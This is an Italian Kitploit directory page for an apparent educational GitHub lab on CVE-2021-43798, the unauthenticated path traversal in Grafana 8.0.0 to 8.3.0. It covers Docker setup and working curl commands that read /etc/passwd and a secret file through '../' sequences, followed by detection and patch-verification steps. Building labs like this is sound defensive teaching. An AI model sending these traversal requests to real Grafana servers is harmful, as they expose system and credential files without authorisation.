Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
-INE_Shivam_Gupta_23104003 — CVE-2021-43798 Grafana Path Traversal non autenticato - Security Lab | Shivam Gupta | 23104003 | Kitploit
Strumenti/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana Path Traversal non autenticato - Security Lab | Shivam Gupta | 23104003

Vedi Repository
6h 49m faNon ancora revisionato

CVE-2021-43798 — Lab di Path Traversal non autenticato in Grafana

Solo per uso didattico. Esegui questo lab solo su una macchina locale isolata. Non esporlo mai a Internet.


Riepilogo CVE

CampoDettaglio
CVE IDCVE-2021-43798
ProdottoGrafana
Versioni interessate8.0.0 – 8.3.0
Versione corretta8.3.1+
GravitàAlta
Punteggio CVSS v3.17.5
CWECWE-22 — Path Traversal
Autenticazione richiestaNessuna
Vettore di attaccoRete

Prerequisiti

  • Docker Desktop (in esecuzione)
  • Git
  • curl

Configurazione

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

Avvia l'ambiente vulnerabile

root@kitploit:~
docker compose up -d

Verifica:

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Atteso: "version": "8.3.0"

Apri http://127.0.0.1:3000 — login: admin / admin


Sfrutta la vulnerabilità

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

Atteso: contenuto del file restituito con HTTP 200 — nessuna autenticazione richiesta.


Rilevamento

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

Se viene restituito l'hostname → VULNERABILE. Versione 8.0.0–8.3.0 → VULNERABILE.


Remediation

Avvia l'istanza corretta (Grafana 8.3.1):

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

Verifica che l'exploit sia bloccato:

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Atteso: {"message": "Plugin file not found"}

Arresta il lab

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
Scarica lo strumento